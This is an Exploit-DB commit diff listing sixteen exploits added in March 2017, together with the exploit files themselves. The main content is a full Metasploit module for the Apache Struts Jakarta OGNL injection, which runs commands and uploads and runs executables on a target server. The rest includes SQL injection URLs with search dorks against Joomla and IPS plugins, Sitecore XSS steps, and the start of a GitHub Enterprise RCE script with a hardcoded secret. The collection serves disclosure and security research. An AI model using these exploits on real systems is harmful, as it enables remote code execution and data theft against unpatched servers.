DB: 2017-03-16

16 new exploits

Adobe Flash - Metadata Parsing Out-of-Bounds Read
Adobe Flash - MovieClip Attach init Object Use-After-Free
Adobe Flash - ATF Thumbnailing Heap Overflow
Adobe Flash - ATF Planar Decompression Heap Overflow
Adobe Flash - AVC Header Slicing Heap Overflow
Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow

USBPcap - Privilege Escalation
USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation
Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)

Cisco Firepower Management Console 6.0 - Post Authentication UserAdd
Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)
IBM WebSphere - RCE Java Deserialization (Metasploit)
Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)
Joomla! Component Vik Appointments 1.5 - SQL Injection
Joomla! Component Vik Rent Items 1.3 - SQL Injection
Joomla! Component Vik Rent Car 1.11 - SQL Injection
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution
Steam Profile Integration 2.0.11 - SQL injection
Sitecore CMS 8.1 Update-3 - Cross-Site Scripting

files.csv

@@ -5391,6 +5391,12 @@ id,file,description,date,author,platform,type,port
 41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
 41596,platforms/windows/dos/41596.py,"Cerberus FTP Server  8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
 41601,platforms/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos,0
+41608,platforms/multiple/dos/41608.txt,"Adobe Flash - Metadata Parsing Out-of-Bounds Read",2017-03-15,"Google Security Research",multiple,dos,0
+41609,platforms/multiple/dos/41609.txt,"Adobe Flash - MovieClip Attach init Object Use-After-Free",2017-03-15,"Google Security Research",multiple,dos,0
+41610,platforms/multiple/dos/41610.txt,"Adobe Flash - ATF Thumbnailing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
+41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
+41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
+41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8829,8 +8835,10 @@ id,file,description,date,author,platform,type,port
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
-41542,platforms/windows/local/41542.c,"USBPcap - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
+41542,platforms/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
 41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
+41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0
+41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15294,7 +15302,7 @@ id,file,description,date,author,platform,type,port
 40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
 41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
 41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
-41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
+41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)",2017-01-13,Metasploit,linux,remote,0
 41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
 41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
 41146,platforms/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
@@ -15318,6 +15326,8 @@ id,file,description,date,author,platform,type,port
 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate  2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
 41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
 41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
+41613,platforms/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,windows,remote,8800
+41614,platforms/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,multiple,remote,8080
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37516,3 +37526,9 @@ id,file,description,date,author,platform,type,port
 41594,platforms/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,php,webapps,0
 41599,platforms/php/webapps/41599.txt,"Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0
 41600,platforms/php/webapps/41600.txt,"Joomla! Component Advertisement Board 3.0.4 - 'id' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0
+41602,platforms/php/webapps/41602.txt,"Joomla! Component Vik Appointments 1.5 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps,0
+41603,platforms/php/webapps/41603.txt,"Joomla! Component Vik Rent Items 1.3 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps,0
+41604,platforms/php/webapps/41604.txt,"Joomla! Component Vik Rent Car 1.11 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps,0
+41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
+41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
+41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0

platforms/aspx/webapps/41618.txt

@@ -0,0 +1,54 @@
+# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore Experience Platform 8.1 Update-3
+# Date: March 15, 2017
+# Exploit Author: Pralhad Chaskar
+# Vendor Homepage: http://www.sitecore.net/en
+# Version: 8.1 rev. 160519
+# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
+# CVE : CVE-2016-8855
+
+Vendor Description
+------------------
+Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
+
+Description
+------------
+Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
+
+Vulnerability Class
+--------------------
+Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
+
+Proof of Concept
+----------------
+Name and Description input fields aren't properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.
+
+1. Login to application and navigate to "https://abc.com/sitecore/client/Applications/List Manager/Taskpages/Contact list"
+2. Create new Contact List, add the XSS vector in Name and Description parameter using proxy (Burp) and Save the Contact List
+3. Navigate Dashboard of List Manager on "https://abc.com/sitecore/shell/sitecore/client/Applications/List Manager/Dashboard" leading to execution of XSS payload.
+
+Vendor Contact Timeline
+------------------------
+Discovered: October 16, 2016
+Vendor Notification: October 18, 2016
+Advisory Publication: Mar 15, 2017
+Public Disclosure: Mar 15, 2017
+
+Affected Targets
+----------------
+Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
+
+Solution
+--------
+Upgrade to Sitecore Experience Platform 8.2 Update-2 to fix this issue.
+
+Credits
+-------
+Pralhad Chaskar
+Information Security Analyst
+Help AG Middle East
+
+References
+----------
+[1] Help AG Middle East http://www.helpag.com/
+[2] Sitecore Experience Platform https://dev.sitecore.net/Downloads/Sitecore_Experience_Platform.aspx
+

platforms/linux/remote/5632.rb

@@ -20,6 +20,8 @@
 # Usage:
 # debian_openssh_key_test.rb <host> <user> <keydir>
 #
+# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploit-database/pull/76/files
+#
 
 require 'thread'
 

platforms/multiple/dos/41608.txt

@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1005
+
+The attached file causes an out-of-bounds read when its metadata is parsed
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41608.zip

platforms/multiple/dos/41609.txt

@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1006
+
+The attached file causes a use-after-free in attaching a MovieClip and applying the init object.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41609.zip

platforms/multiple/dos/41610.txt

@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015
+
+The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41610.zip

platforms/multiple/dos/41611.txt

@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016
+
+The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, but both attached files on a server and visit: http://127.0.0.1/LoadImage.swf?img=planar1.atf
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41611.zip

platforms/multiple/dos/41612.txt

@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017
+
+There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41612.zip

platforms/multiple/remote/41614.rb

@@ -0,0 +1,229 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts Jakarta Multipart Parser OGNL Injection',
+      'Description'    => %q{
+        This module exploits a remote code execution vunlerability in Apache Struts
+        version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed
+        via http Content-Type header.
+
+        Native payloads will be converted to executables and dropped in the
+        server's temp dir. If this fails, try a cmd/* payload, which won't
+        have to write to the disk.
+      },
+      'Author'         => [
+        'Nike.Zheng', # PoC
+        'Nixawk',     # Metasploit module
+        'Chorder',    # Metasploit module
+        'egypt',      # combining the above
+        'Jeffrey Martin', # Java fu
+      ],
+      'References'     => [
+        ['CVE', '2017-5638'],
+        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
+      ],
+      'Privileged'     => true,
+      'Targets'        => [
+        [
+          'Universal', {
+            'Platform'   => %w{ unix windows linux },
+            'Arch'       => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+          },
+        ],
+      ],
+      'DisclosureDate' => 'Mar 07 2017',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
+        ]
+      )
+      register_advanced_options(
+        [
+          OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])
+        ]
+      )
+
+    @data_header = "X-#{rand_text_alpha(4)}"
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+
+    ognl = ""
+    ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
+    ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
+
+    begin
+      resp = send_struts_request(ognl)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.headers[var_a]
+      vprint_good("Victim operating system: #{resp.headers[var_a]}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    case payload.arch.first
+    #when ARCH_JAVA
+    #  datastore['LHOST'] = nil
+    #  resp = send_payload(payload.encoded_jar)
+    when ARCH_CMD
+      resp = execute_command(payload.encoded)
+    else
+      resp = send_payload(generate_payload_exe)
+    end
+
+    require'pp'
+    pp resp.headers if resp
+  end
+
+  def send_struts_request(ognl, extra_header: '')
+    uri = normalize_uri(datastore["TARGETURI"])
+    content_type = "%{(#_='multipart/form-data')."
+    content_type << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+    content_type << "(#_memberAccess?"
+    content_type << "(#_memberAccess=#dm):"
+    content_type << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    content_type << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    content_type << "(#ognlUtil.getExcludedPackageNames().clear())."
+    content_type << "(#ognlUtil.getExcludedClasses().clear())."
+    content_type << "(#context.setMemberAccess(#dm))))."
+    content_type << ognl
+    content_type << "}"
+
+    headers = { 'Content-Type' => content_type }
+    if extra_header
+      headers[@data_header] = extra_header
+    end
+
+    #puts content_type.gsub(").", ").\n")
+    #puts
+
+    resp = send_request_cgi(
+      'uri'     => uri,
+      'method'  => datastore['HTTPMethod'],
+      'headers' => headers
+    )
+
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    end
+    resp
+  end
+
+  def execute_command(cmd)
+    ognl = ''
+    ognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
+
+    # You can add headers to the server's response for debugging with this:
+    #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
+    #ognl << %q|(#r.addHeader('decoded',#cmd)).|
+
+    ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
+    ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|
+    ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|
+    ognl << %q|(#p.redirectErrorStream(true)).|
+    ognl << %q|(#process=#p.start())|
+
+    send_struts_request(ognl, extra_header: cmd)
+  end
+
+  def send_payload(exe)
+
+    ognl = ""
+    ognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
+    ognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).|
+    #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
+    #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|
+    ognl << %q|(#f.setExecutable(true)).|
+    ognl << %q|(#f.deleteOnExit()).|
+    ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|
+
+    # Using stuff from the sun.* package here means it likely won't work on
+    # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to
+    # work and I don't see a better way of getting binary data onto the
+    # system. =/
+    ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|
+    ognl << %q|(#fos.write(#d)).|
+    ognl << %q|(#fos.close()).|
+
+    ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|
+    ognl << %q|(#p.start()).|
+    ognl << %q|(#f.delete())|
+
+    send_struts_request(ognl, extra_header: [exe].pack("m").delete("\n"))
+  end
+
+end
+
+=begin
+Doesn't work:
+
+    ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|
+    ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|
+    ognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).|
+    ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|
+    ognl << %q|(#m.invoke(null,null)).|
+
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).|  # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899
+    #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).|        # parse failed
+    #ognl << %q|(#m=#c.getMethod('run',null)).|                          # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6
+
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
+    #ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).|     # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).|      # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5
+    #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).|       # parse failed
+    #ognl << %q|(#m=#c.getMethod('main',null)).|                         # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884
+
+=end

platforms/php/webapps/41602.txt

@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection
+# Google Dork: inurl:index.php?option=com_vikappointments
+# Date: 15.03.2017
+# Vendor Homepage: https://extensionsforjoomla.com/
+# Software : https://extensionsforjoomla.com/livedemo/vikappointments/
+# Demo: https://extensionsforjoomla.com/livedemo/vikappointments/
+# Version: 1.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/en/our-staff?view=employeeslist&ordering=6&filters[group]=[SQL]&filters[service]=[SQL]&filters[country]=[SQL]&filters[state]=[SQL]
+# ext4joo_vikappointmentsj3demo
+# Etc..
+# # # # #

platforms/php/webapps/41603.txt

@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Vik Rent Items v1.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_vikrentitems
+# Date: 15.03.2017
+# Vendor Homepage: https://extensionsforjoomla.com/
+# Software : https://extensionsforjoomla.com/components-modules/vik-rent-items-e4j
+# Demo: https://extensionsforjoomla.com/livedemo/vikrentitems/
+# Version: 1.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/en/?option=com_vikrentitems&task=showprc&itemopt=[SQL]&days=2&pickup=1490790600&release=1490947200&place=[SQL]&Itemid=132
+# ext4joo_vikrentitemsj3demo
+# Etc..
+# # # # #

platforms/php/webapps/41604.txt

@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Vik Rent Car v1.11 - SQL Injection
+# Google Dork: inurl:index.php?option=com_vikrentcar
+# Date: 15.03.2017
+# Vendor Homepage: https://extensionsforjoomla.com/
+# Software : https://extensionsforjoomla.com/components-modules/vik-rent-car-e4j
+# Demo: https://extensionsforjoomla.com/livedemo/vikrentcar/
+# Version: 1.11
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/en/?option=com_vikrentcar&caropt=[SQL]&days=31&pickup=1490947200&release=1493542800&place=[SQL]&task=showprc&Itemid=104
+# ext4joo_vikrentcarj3demo
+# Etc..
+# # # # #

platforms/php/webapps/41617.txt

@@ -0,0 +1,34 @@
+# Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection
+# Google Dork: inurl:tab=node_steam_steamprofile
+# Date: 13/03/2017
+# Exploit Author: DrWhat
+# Vendor Homepage: https://invisionpower.com/files/file/8170-steam-profile-integration/
+# Software Link: https://invisionpower.com/files/file/8170-steam-profile-integration/
+# Version: 2.0.11 and below
+# Tested on: Windows Server 2008 PHP7 & Linux Debian PH5.6
+
+# SQL Injection/Exploit: http://localhost/path/index.php?app=steam&module=steam&section=steamProfile&do=update&id=[USER_WITH_STEAM]%' OR EXTRACTVALUE(1001,CONCAT(0x3A,([QUERY]),0x3A)) AND '%'='&csrfKey=[CSRF_KEY]
+
+
+# Vulnerable code: /sources/Update/Update.php updateProfile() function
+# 532: $ids = array();
+# 533: $steamids = '';
+# 534: $select = "s.st_member_id,s.st_steamid,s.st_restricted";
+# 535: $where = "s.st_steamid>0 AND s.st_restricted!='1'";
+# 536: if($single)
+# 537: {
+# 538:    $where .= " AND s.st_member_id='{$single}'"; // $single is $_GET['id'] pass through the router
+# 539:
+# 540:    /* Is the member already in the database ? */
+# 541:    $s = \IPS\steam\Profile::load($single); // IPS Profile model cleans the request and successfully executes the query
+
+
+# 573: $query = \IPS\Db::i()->select( $select, array('steam_profiles', 's'), $where, 's.st_member_id ASC', array( $this->extras['profile_offset'], 100), NULL, NULL, '011'); // Our payload is then later executed in the $where variable unsanitized
+
+
+# Timeline
+# 13/03/2017: Exploit discovered
+# 13/03/2017: Vendor notified
+# 14/03/2017: Vendor confirmed vulnerablity
+# 15/03/2017: Vendor releases patch 2.0.12
+# 15/03/2017: Public disclosure

platforms/ruby/webapps/41616.rb

@@ -0,0 +1,102 @@
+#!/usr/bin/ruby
+require "openssl"
+require "cgi"
+require "net/http"
+require "uri"
+
+SECRET = "641dd6454584ddabfed6342cc66281fb"
+
+puts '                     ___.   .__                 '
+puts '  ____ ___  ________ \_ |__ |  |  __ __   ____  '
+puts '_/ __ \\\\  \/  /\__  \ | __ \|  | |  |  \_/ __ \ '
+puts '\  ___/ >    <  / __ \| \_\ \  |_|  |  /\  ___/ '
+puts ' \___  >__/\_ \(____  /___  /____/____/  \___  >'
+puts '     \/      \/     \/    \/                 \/ '
+puts ''
+puts "github Enterprise RCE exploit"
+puts "Vulnerable: 2.8.0 - 2.8.6"
